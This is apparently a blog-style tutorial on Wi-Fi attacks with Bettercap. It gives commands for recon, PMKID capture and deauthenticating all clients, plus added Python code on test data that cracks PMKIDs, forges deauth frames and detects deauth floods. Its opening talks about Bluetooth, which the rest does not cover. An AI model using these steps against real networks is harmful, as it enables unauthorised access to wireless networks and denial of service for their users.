Bluetooth devices are everywhere: mobile phones, watches, headphones, computers and more. They are also a target for attackers who mount simple or complex attacks to collect information about them, track them or take them over. In today's guide we take a brief look at attacks with Bettercap.
Although the Bluetooth specification supports randomized MAC addresses, many manufacturers do not use them, which lets attackers use tools like Bettercap to scan for and track Bluetooth devices.
How useful the information collected with Bettercap is usually depends on the device manufacturer. Bluetooth is in general a more secure protocol than Wi-Fi, provided it is implemented correctly. Unfortunately for end users, many manufacturers do not take advantage of protocol features such as MAC address randomization and instead broadcast the same MAC address everywhere. This makes a device easy to track and makes it easy to determine what kind of device is behind the Bluetooth address.
In this guide, we will use Bettercap to find Wi-Fi APs, de-authenticate their clients and capture their hashes with a PMKID attack.
Step #1: Install Bettercap
There are several ways to install Bettercap, but perhaps the easiest is to download and install it from the Kali repository:
kali > sudo apt install bettercap
Alternatively, you can install the dependencies and then install the Ruby gem. Note that the gem is the legacy 1.x (Ruby) version of bettercap; the Kali package is the current Go-based 2.x release, which is the one that provides the wifi module used below.
kali > sudo gem install bettercap
Step #2: Check your network adapter
Next, we need to check the Wi-Fi adapter. If you're using a VM like VirtualBox or VMware Workstation, you'll probably need an external USB Wi-Fi adapter (I use Alfa's network card. It's simple, cheap, and most importantly, it works!). Use the ifconfig command in Linux to find your adapter name.
kali > sudo ifconfig
Note that my adapter is called wlan0. Yours may be different. The key is to know what your system has named the Wi-Fi adapter.
Step #3: Start Bettercap
Next we need to start bettercap. Since we will be using it for Wi-Fi attacks, we have to tell bettercap at startup to use wlan0; otherwise it auto-selects the default interface, usually eth0.
kali > sudo bettercap -iface wlan0
Let's take a look at the help screen before we start. This is always a good first step with a new tool.
kali > help
Note that only two modules are running: events.stream and wifi. To display the help screen for any module, type help followed by the module name. In this case, let's look at the help screen of the wifi module.
kali > help wifi
For starters, let's do an identification of the nearby wifi-APs.
Step #4: Check your nearby Wi-Fi APs
To launch bettercap's recon module, simply enter the command wifi.recon on.
kali > wifi.recon on
Bettercap now tries to find all APs in range and records their basic parameters.
We can use wifi.show to list all discovered Wi-Fi APs with their basic parameters: BSSID, SSID, encryption type, whether they have WPS enabled and, if so, which WPS version (1.0 or 2.0).
kali > wifi.show
With this information, we can either turn to another tool such as aircrack-ng to attack these APs, or proceed with one of bettercap's own attacks.
Step #5: PMKID Attack
One of the newer Wi-Fi attacks is the PMKID attack (for more information on the PMKID attack, see the linked guide). Its key advantage is that you do not have to wait for a client to connect to the AP in order to capture a crackable hash: the PMKID is sent by the AP itself in the first message of the 4-way handshake, so a single association attempt from the attacker is enough. Its weaknesses are that not every AP includes a PMKID in that message (in which case the attack yields nothing and you must fall back to capturing a full handshake), and that capturing and cracking can be very slow.
To launch the PMKID attack, we use the wifi.assoc command. You can target a single AP or every AP in range: follow wifi.assoc with the BSSID of the chosen AP, or with the keyword all.
kali > wifi.assoc all
When bettercap captures a handshake or PMKID, it appends it to ~/bettercap-wifi-handshakes.pcap. You can change that location with the wifi.handshakes.file parameter, which must be set before launching the attack:
kali > set wifi.handshakes.file /home/kali/handshakes
kali > wifi.assoc all
To crack the hashes, first convert the capture with hcxpcapngtool (from the hcxtools package), which extracts the PMKIDs and handshakes from the pcap and drops everything else, then run hashcat in mode 22000 against the resulting file (for more information on this process see the PMKID attack guide).
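The following is an added example, not code from the original guide or from bettercap, hcxtools or hashcat. It reproduces what bettercap captures during wifi.assoc (the PMKID carried in the AP's EAPOL-Key message 1), what hcxpcapngtool turns it into (a hashcat mode 22000 line), and the computation hashcat repeats for every candidate passphrase, using only the Python standard library. The SSID, passphrase and MAC addresses are constructed test values, and the EAPOL frame is built by the script rather than captured.

```python
"""PMKID extraction and offline check, as an added illustration of the PMKID attack.

Added example (not part of the original guide, bettercap, hcxtools or hashcat).
SSID, passphrase, MACs and the EAPOL frame below are constructed test data.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

EAPOL_KEY = 3                 # EAPOL packet type: Key
RSN_DESCRIPTOR = 2            # IEEE 802.11 (RSN) key descriptor type
RSN_OUI = b"\x00\x0f\xac"
KDE_PMKID = 0x04              # key data encapsulation type for a PMKID
KEY_FRAME_FIXED_LEN = 95      # descriptor .. key data length, before the key data


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC).

    Nothing from the client except its MAC enters this value, which is why an AP
    that sends it in message 1 hands over a crackable hash before any client
    has authenticated.
    """
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def build_eapol_m1(pmkid: bytes) -> bytes:
    """Constructed EAPOL-Key message 1 carrying a PMKID KDE in its key data."""
    kde = bytes([0xDD, 4 + len(pmkid)]) + RSN_OUI + bytes([KDE_PMKID]) + pmkid
    body = struct.pack(">BHHQ", RSN_DESCRIPTOR, 0x008A, 16, 1)  # descriptor, key info, key length, replay counter
    body += b"\x00" * 32   # ANonce (irrelevant for the PMKID)
    body += b"\x00" * 16   # key IV
    body += b"\x00" * 8    # key RSC
    body += b"\x00" * 8    # reserved
    body += b"\x00" * 16   # MIC is zero in message 1
    body += struct.pack(">H", len(kde)) + kde
    return struct.pack(">BBH", 2, EAPOL_KEY, len(body)) + body


def extract_pmkid(eapol: bytes) -> Optional[bytes]:
    """Return the PMKID from an EAPOL-Key message 1, or None if the frame carries none."""
    if len(eapol) < 4 or eapol[1] != EAPOL_KEY:
        return None
    body = eapol[4:4 + struct.unpack(">H", eapol[2:4])[0]]
    if len(body) < KEY_FRAME_FIXED_LEN or body[0] != RSN_DESCRIPTOR:
        return None
    key_info = struct.unpack(">H", body[1:3])[0]
    if key_info & 0x0100:          # Key MIC bit set: messages 2-4, not message 1
        return None
    key_data_len = struct.unpack(">H", body[93:95])[0]
    key_data = body[95:95 + key_data_len]
    i = 0
    while i + 2 <= len(key_data):  # walk the TLV list of KDEs / IEs
        tag, length = key_data[i], key_data[i + 1]
        value = key_data[i + 2:i + 2 + length]
        if tag == 0xDD and len(value) == 20 and value[:4] == RSN_OUI + bytes([KDE_PMKID]):
            return value[4:]
        i += 2 + length
    return None


def hashcat_22000_line(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Hashcat mode 22000 line for a PMKID (type 01); the trailing fields are only used for full handshakes."""
    return "WPA*01*%s*%s*%s*%s***" % (pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex())


def crack_pmkid(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str,
                wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: one PBKDF2 plus one HMAC per candidate, the work hashcat parallelises."""
    for candidate in wordlist:
        guess = compute_pmkid(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, pmkid):
            return candidate
    return None


def demo():
    """End to end on constructed data: AP leaks PMKID in M1 -> hash line -> recovered passphrase."""
    ssid, passphrase = "TestNet", "correct horse"
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    frame = build_eapol_m1(compute_pmkid(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac))
    pmkid = extract_pmkid(frame)
    line = hashcat_22000_line(pmkid, ap_mac, sta_mac, ssid)
    found = crack_pmkid(pmkid, ap_mac, sta_mac, ssid, ["password", "letmein", passphrase])
    return line, found


if __name__ == "__main__":
    print(*demo(), sep="\n")
```

The point of the last function is the cost model: each candidate costs one PBKDF2 derivation with 4096 SHA-1 rounds, so the attack is only as fast as your wordlist is good, which is the slowness the text refers to. It also makes the caveat concrete: if extract_pmkid returns None for every message 1 an AP sends, that AP is not vulnerable to this attack and you need a captured 4-way handshake instead.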
Step #6: De-Authenticate with Bettercap
One of the often overlooked attacks against Wi-Fi APs is Denial of Service (DoS). Among the many frame types in Wi-Fi is the deauthentication or deauth frame. This frame tears down a client's association with the AP and forces it to reconnect. Sent once, it is useful for forcing the client to redo the 4-way handshake so the handshake can be captured in a traditional WPA2 attack; sent continuously, it prevents the client from ever re-authenticating, creating a denial of service. Note that clients and APs that negotiate 802.11w (Protected Management Frames) authenticate deauth frames and will ignore forged ones.
Bettercap makes it simple to kick clients off an AP: use the wifi.deauth command followed by the BSSID of the AP whose clients you want to disconnect, such as:
kali > wifi.deauth <BSSID>
To deauthenticate all clients on all APs, use the all keyword (wifi.deauth all): bettercap will cycle through every AP it has discovered and deauthenticate the clients associated with each one.
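The following is an added example, not code from the original guide or from bettercap. It shows at the byte level why wifi.deauth needs no credentials: a deauthentication frame is an ordinary management frame with three MAC addresses and a reason code, carrying no MIC unless 802.11w is in use, so anyone who can put the AP's MAC in the transmitter field can send one. It also includes the detection side, a small sliding-window counter that flags the burst of broadcast deauths a deauth flood produces in a monitor-mode capture. Nothing is transmitted; the frames, MAC addresses and timestamps are constructed test data.

```python
"""802.11 deauthentication frames: what a deauth attack sends and how to spot a flood.

Added example (not part of the original guide or of bettercap). Frames are built
as byte strings only; MAC addresses and timestamps are constructed test values.
"""
import struct
from collections import defaultdict
from typing import Dict, Iterable, Optional, Tuple

SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
BROADCAST = b"\xff" * 6
REASON_CLASS3_FROM_NONASSOC_STA = 7   # standard 802.11 reason code


def frame_control(subtype: int) -> int:
    """Frame control for a management frame (type 0, protocol version 0) of the given subtype."""
    return subtype << 4


def build_deauth(dst: bytes, src: bytes, bssid: bytes,
                 reason: int = REASON_CLASS3_FROM_NONASSOC_STA, seq: int = 0) -> bytes:
    """Deauth frame: FC, duration, addr1 (receiver), addr2 (transmitter), addr3 (BSSID), seq ctl, reason.

    Putting the AP's MAC in addr2 is all the spoofing required; nothing in this
    frame is authenticated unless the network negotiated Protected Management Frames.
    """
    return struct.pack("<HH6s6s6sHH", frame_control(SUBTYPE_DEAUTH), 0x013A,
                       dst, src, bssid, seq << 4, reason)


def parse_mgmt(frame: bytes) -> Optional[Tuple[int, bytes, bytes, bytes, Optional[int]]]:
    """Return (subtype, addr1, addr2, addr3, reason) for a management frame, else None."""
    if len(frame) < 24:
        return None
    fc = struct.unpack("<H", frame[:2])[0]
    if (fc >> 2) & 0x3 != 0:                      # type bits must be 0 (management)
        return None
    subtype = (fc >> 4) & 0xF
    reason = None
    if subtype in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH) and len(frame) >= 26:
        reason = struct.unpack("<H", frame[24:26])[0]
    return subtype, frame[4:10], frame[10:16], frame[16:22], reason


def detect_deauth_flood(capture: Iterable[Tuple[float, bytes]], window: float = 1.0,
                        threshold: int = 10) -> Dict[bytes, int]:
    """Flag BSSIDs that emit >= threshold deauth/disassoc frames within any `window` seconds.

    Returns {bssid: peak count in a window}. A run of broadcast deauths
    (addr1 = ff:ff:ff:ff:ff:ff) in a short window is the signature of a
    deauth-all run against that AP.
    """
    per_bssid = defaultdict(list)
    for ts, raw in capture:
        parsed = parse_mgmt(raw)
        if parsed and parsed[0] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            per_bssid[parsed[3]].append(ts)
    alerts: Dict[bytes, int] = {}
    for bssid, times in per_bssid.items():
        times.sort()
        start = 0
        for end in range(len(times)):             # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[bssid] = max(alerts.get(bssid, 0), count)
    return alerts


def demo() -> Dict[bytes, int]:
    """Constructed capture: a 20-frame broadcast deauth burst from one AP, two benign deauths from another."""
    attacked_ap = bytes.fromhex("001122334455")
    quiet_ap = bytes.fromhex("aabbccddeeff")
    client = bytes.fromhex("66778899aabb")
    capture = [(i * 0.02, build_deauth(BROADCAST, attacked_ap, attacked_ap, seq=i)) for i in range(20)]
    capture += [(3.0, build_deauth(client, quiet_ap, quiet_ap)),
                (63.0, build_deauth(client, quiet_ap, quiet_ap))]
    # a beacon (subtype 8) from the quiet AP, which the detector must ignore
    capture.append((5.0, struct.pack("<HH6s6s6sH", frame_control(8), 0, BROADCAST, quiet_ap, quiet_ap, 0)))
    return detect_deauth_flood(capture)


if __name__ == "__main__":
    for bssid, count in demo().items():
        print("deauth flood from %s: %d frames within 1s" % (bssid.hex(":"), count))
```

The threshold and window are starting points, not tuned values: an AP legitimately deauthenticates clients now and then (as the quiet AP does here), so the detector keys on rate and on the broadcast receiver address rather than on the presence of deauth frames at all.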
Summary
Bettercap is a great tool for Man-in-the-Middle attacks, but I find it a bit difficult to use for Wi-Fi attacks. I have been using aircrack-ng for many years and know it well. The beauty of this industry is that there are so many different tools and I'm sure you can find one that works well for you. Many beginners may prefer the easy-to-use environment and the helpful help displays that Bettercap offers for Wi-Fi hacking.